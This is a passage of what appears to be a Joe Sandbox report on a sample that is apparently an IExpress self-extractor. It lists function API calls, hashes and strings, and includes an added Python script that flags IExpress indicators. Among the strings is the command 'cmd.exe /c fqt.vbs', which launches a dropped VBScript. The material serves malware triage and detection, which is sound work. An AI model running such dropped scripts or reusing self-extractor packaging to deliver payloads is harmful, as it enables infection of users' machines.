• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4C0D
Strings
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
• Instruction ID: dbfa9e076c201dac537518cbb21b26cfbce74d907c31c6601d2a9a40f8a985df
• Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
• Instruction Fuzzy Hash: 15516F21E09E4A86E641AB11AC5027FBA91FB5AB81FC84136DF4E03794DF3CF44ACB10
APIs
Strings
Similarity
• API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
• String ID: cmd.exe /c fqt.vbs$rce.
• API String ID: 2929476258-2284415721
• Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
• Instruction ID: f37603a900f2db6cd8789f68ed5539aa446d1e0f2f3e548bcc8396b900939446
• Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
• Instruction Fuzzy Hash: 65619521E08B8986EA11AB65AC003BEEB90AB59794FC85232DF5D07795DF3CF5478B10
APIs
Strings
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
• Instruction ID: 22d54ac6665c7389cb7399974d963c5c65ef5abd615b12ddb73a953e6a7f0489
• Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
• Instruction Fuzzy Hash: 12517372A08A8596EB10DB14EC542BEB7A0FB86B90FD85132DB4E03754DF3CE446CB50
APIs
Strings
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: cmd.exe /c fqt.vbs
• API String ID: 3785188418-3590164600
• Opcode ID: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
• Instruction ID: 601f6a8b6985e9d4ce43548106a4b14215cf0509565cb9d40eaea7679c429357
• Opcode Fuzzy Hash: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
• Instruction Fuzzy Hash: 8F310435D08E4A86E6116B54AC043BEEA91FB9BB51FCC9332CB1E02394CF3DB046CA10
APIs
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                      • String ID:
                                                                      • API String ID: 2168512254-0
                                                                      • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                      • Instruction ID: d0b10da01ee1cc71e5ff41e3ad18ddaab2fa203f79d19588eb863eb2efb49734
                                                                      • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                      • Instruction Fuzzy Hash: C4513D32A04A45CAE710AF21E8442AEBBA4FB5EB88FC95136DB0E53754DF38E445CB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                      • API String ID: 3346862599-1109908249
                                                                      • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                      • Instruction ID: 13cef9b21e9f0f27a706f649b86d9371e1b13ec8b38b2c8f74306f296ab1c41a
                                                                      • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                      • Instruction Fuzzy Hash: 74516E32E09A858AEB10AB20984426EB7A5F788B94FCD5532DB6D03794DF3CF446CB10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                      • String ID:
                                                                      • API String ID: 1051330783-0
                                                                      • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                      • Instruction ID: 56ed3dbcb23338ca705a21a76eb8cd94011ac920a9d83a6da0c879ed0057e6e5
                                                                      • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                      • Instruction Fuzzy Hash: 4A514132E04A468AEA10EF559C006BEB7A4FB48B95FD85132DF0963794DF39F4428B61
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                      • String ID:
                                                                      • API String ID: 975904313-0
                                                                      • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                      • Instruction ID: f11dd5bb2c6a4936a6bd04b7e4f89dda37d157faa93d58251d93a7c1f872e860
                                                                      • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                      • Instruction Fuzzy Hash: 11517551E08A8945FB21AF1598043BEEA91AB49B95FCC4172CB5E07785CE7CF4478B60
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5078
                                                                        • Part of subcall function 00007FF7D6FD5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5089
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50AF
                                                                        • Part of subcall function 00007FF7D6FD5050: LoadResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50C0
                                                                        • Part of subcall function 00007FF7D6FD5050: LockResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50CF
                                                                        • Part of subcall function 00007FF7D6FD5050: memcpy_s.MSVCRT ref: 00007FF7D6FD50EE
                                                                        • Part of subcall function 00007FF7D6FD5050: FreeResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50FD
                                                                      • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7D6FD3139), ref: 00007FF7D6FD3F95
                                                                      • LocalFree.KERNEL32 ref: 00007FF7D6FD4018
                                                                        • Part of subcall function 00007FF7D6FD4DCC: LoadStringA.USER32 ref: 00007FF7D6FD4E60
                                                                        • Part of subcall function 00007FF7D6FD4DCC: MessageBoxA.USER32 ref: 00007FF7D6FD4EA0
                                                                        • Part of subcall function 00007FF7D6FD7700: GetLastError.KERNEL32 ref: 00007FF7D6FD7704
                                                                      • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7D6FD3139), ref: 00007FF7D6FD403E
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00007FF7D6FD3139), ref: 00007FF7D6FD409F
                                                                        • Part of subcall function 00007FF7D6FD7AC8: FindResourceA.KERNEL32 ref: 00007FF7D6FD7AF2
                                                                        • Part of subcall function 00007FF7D6FD7AC8: LoadResource.KERNEL32 ref: 00007FF7D6FD7B09
                                                                        • Part of subcall function 00007FF7D6FD7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7D6FD7B3F
                                                                        • Part of subcall function 00007FF7D6FD7AC8: FreeResource.KERNEL32 ref: 00007FF7D6FD7B51
                                                                      • LocalFree.KERNEL32 ref: 00007FF7D6FD4078
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                      • String ID: <None>$LICENSE
                                                                      • API String ID: 2414642746-383193767
                                                                      • Opcode ID: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                      • Instruction ID: 237456d6334a9d06d4f7d0f79a5ab6f568928330c51f66706883dac666f46c45
                                                                      • Opcode Fuzzy Hash: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                      • Instruction Fuzzy Hash: 1B311922E19E0A86E710BB60AC1577FB660EB95785FC89136DB0D46694DF7DB00A8F20
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD114C: _vsnprintf.MSVCRT ref: 00007FF7D6FD1189
                                                                      • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD7763
                                                                      • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD7772
                                                                      • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD77B8
                                                                      • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD77EC
                                                                      • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD7805
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                      • String ID: UPDFILE%lu
                                                                      • API String ID: 2922116661-2329316264
                                                                      • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                      • Instruction ID: 757edd174138010a68a90295b7b7f235e295bf5a71f4ac743555e87d59d62d7e
                                                                      • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                      • Instruction Fuzzy Hash: 30314132E08E4586E710AB55A80026EF6A1FB99B50FD98636DB5D07794CF3CF406CB10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                      • String ID:
                                                                      • API String ID: 3370778649-0
                                                                      • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                      • Instruction ID: a934b73dddf0a5a02af01f5670b6a0a686b0f0f7fa4f957835b8d52716996de1
                                                                      • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                      • Instruction Fuzzy Hash: A9111D21B08F4587E7146F62A84417EFAA0EB4EFC1BC99139DE0E43754DE3CE4468A10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                      • String ID: wininit.ini
                                                                      • API String ID: 3273605193-4206010578
                                                                      • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                      • Instruction ID: 401c42fe226e97317ecc433bc13d0969f59bf2e5bfcfbf9a5100aaf90ebb093d
                                                                      • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                      • Instruction Fuzzy Hash: 4F112E32A04A4587E710AB61EC542AEB6A1FBCD705FC98232DB4E43654DE3CE50ACA10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Text$DesktopDialogForegroundItem
                                                                      • String ID: cmd.exe /c fqt.vbs
                                                                      • API String ID: 761066910-3590164600
                                                                      • Opcode ID: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                      • Instruction ID: b709c2cf4903e2c5cf79097b85d797625480218f0ae55f5b9591ad6f7951a65d
                                                                      • Opcode Fuzzy Hash: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                      • Instruction Fuzzy Hash: CD111F72D4CB4A86E6543B55AC043BEEA51EB4BB41FCC9132CB0E56394CE3DB4468A20
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5078
                                                                        • Part of subcall function 00007FF7D6FD5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5089
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50AF
                                                                        • Part of subcall function 00007FF7D6FD5050: LoadResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50C0
                                                                        • Part of subcall function 00007FF7D6FD5050: LockResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50CF
                                                                        • Part of subcall function 00007FF7D6FD5050: memcpy_s.MSVCRT ref: 00007FF7D6FD50EE
                                                                        • Part of subcall function 00007FF7D6FD5050: FreeResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50FD
                                                                      • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7D6FD3388), ref: 00007FF7D6FD4975
                                                                      • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7D6FD3388), ref: 00007FF7D6FD4A11
                                                                        • Part of subcall function 00007FF7D6FD4DCC: LoadStringA.USER32 ref: 00007FF7D6FD4E60
                                                                        • Part of subcall function 00007FF7D6FD4DCC: MessageBoxA.USER32 ref: 00007FF7D6FD4EA0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$@$FINISHMSG
                                                                      • API String ID: 3507850446-4126004490
                                                                      • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                      • Instruction ID: 12be925102a129e03dcfc87594f1778960ba4f00ec2c9693f2193dd09ede2819
                                                                      • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                      • Instruction Fuzzy Hash: BF116272E08A4687F720AB20E85177FB691EB99795FC89136DB4E42684DF3CE0068F14
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$AttributesFile
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                      • API String ID: 438848745-3680919256
                                                                      • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                      • Instruction ID: b4be7f7bb6c33c2682e4df96877e3a45f8deee8c11dafc6db98a65f1a7bdf26d
                                                                      • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                      • Instruction Fuzzy Hash: EC115331E18E8A95EA11AB10D8403FEB7A0FB55704FC81132C68D466A1CF3CE60BCB10
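                                                                      The function records above fit the Microsoft IExpress self-extractor stub (wextract): resource lookups for UPDFILE%lu, FINISHMSG and LICENSE, a write to wininit.ini, advpack.dll loaded from the IXP000.TMP extraction directory, and the "cmd.exe /c fqt.vbs" string that such a package runs after unpacking. The script below is an added example, not Joe Sandbox's or the sample's code: it parses these IDA-plugin records into one record per function, keeps each function's API calls and strings, and flags the IExpress indicators together with any "cmd.exe /c" target. The marker resource names and artifact paths are an assumption taken from the IExpress SED format rather than from this report, and the input is a constructed subset of the records shown above.

```python
"""Triage helper for Joe Sandbox IDA-plugin function records (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: five of the function records shown above, trimmed to the lines the
# triage logic uses (the repeated memory-dump and hash lines are left out).
SAMPLE = r"""
APIs
• Part of subcall function 00007FF7D6FD114C: _vsnprintf.MSVCRT ref: 00007FF7D6FD1189
• LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD7763
• FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD77EC
Similarity
• API ID: Resource$Free$FindLoadLock_vsnprintf
• String ID: UPDFILE%lu
APIs
Similarity
• String ID: wininit.ini
APIs
Similarity
• String ID: cmd.exe /c fqt.vbs
APIs
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
• String ID: <None>$@$FINISHMSG
APIs
Similarity
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
"""

@dataclass
class ApiCall:
    name: str                   # e.g. FindResourceA
    module: str                 # e.g. KERNEL32
    ref: Optional[str]          # call-site address, when the report gives one
    subcall_of: Optional[str]   # callee address for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    api_calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_id: str = ""

CALL_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<name>\w+)\.(?P<mod>\w+)"
                     r"(?:\([^)]*\))?(?:,? ref: (?P<ref>[0-9A-F]+))?$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

def parse_records(text: str) -> List[FunctionRecord]:
    """One record per function; every record in the plugin output starts at an 'APIs' header."""
    records: List[FunctionRecord] = []
    section = ""
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                records.append(FunctionRecord())
            section = line
        elif not records:
            continue                      # text before the first record (a truncated earlier block)
        elif section == "APIs":
            m = CALL_RE.match(line)
            if m:
                records[-1].api_calls.append(ApiCall(m["name"], m["mod"], m["ref"], m["sub"]))
        elif section == "Similarity":
            key, _, value = (p.strip() for p in line.partition(":"))
            if key == "String ID":        # '$' joins the strings; a literal '$' inside one would split it
                records[-1].strings = [s for s in value.split("$") if s]
            elif key == "API ID":
                records[-1].api_id = value
    return records

# Resource names read by the Microsoft IExpress self-extractor stub (wextract) and the files it
# touches while unpacking. Assumption taken from the IExpress SED format, not from the report.
IEXPRESS_RESOURCES = {"RUNPROGRAM", "POSTRUNPROGRAM", "UPDFILE", "FINISHMSG", "LICENSE",
                      "SHOWWINDOW", "REBOOT", "EXTRACTOPT", "TITLE", "UPROMPT"}
ARTIFACT_RE = re.compile(r"wininit\.ini|advpack\.dll|\\IXP\d{3}\.TMP", re.IGNORECASE)
CMD_RE = re.compile(r"\bcmd(?:\.exe)?\s+/c\s+(\S+)", re.IGNORECASE)

@dataclass
class Assessment:
    resource_markers: List[str] = field(default_factory=list)
    artifacts: List[str] = field(default_factory=list)
    run_commands: List[str] = field(default_factory=list)   # targets of "cmd.exe /c ..."

    def looks_like_iexpress(self) -> bool:
        return len(self.resource_markers) >= 2 or bool(self.resource_markers and self.artifacts)

def assess(records: List[FunctionRecord]) -> Assessment:
    out = Assessment()
    for rec in records:
        # A marker only counts when the function (or a callee) really does resource lookups.
        touches_resources = "Resource" in rec.api_id or any(
            c.name in ("FindResourceA", "FindResourceW", "LoadResource") for c in rec.api_calls)
        for s in rec.strings:
            if touches_resources and s.split("%")[0].upper() in IEXPRESS_RESOURCES:
                out.resource_markers.append(s)       # "UPDFILE%lu" -> UPDFILE
            if ARTIFACT_RE.search(s):
                out.artifacts.append(s)
            m = CMD_RE.search(s)
            if m:
                out.run_commands.append(m.group(1))
    return out

if __name__ == "__main__":
    verdict = assess(parse_records(SAMPLE))
    print("IExpress stub:", verdict.looks_like_iexpress(), verdict)
```

On the constructed input the verdict is positive with UPDFILE%lu and FINISHMSG as resource markers, wininit.ini, the IXP000.TMP path and advpack.dll as artifacts, and fqt.vbs as the command target, which is the dropped script to pull from the sandbox's file list next. A marker string in a function that never touches resources is deliberately ignored, so an unrelated string such as a registry path does not count.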
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1273765764-0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
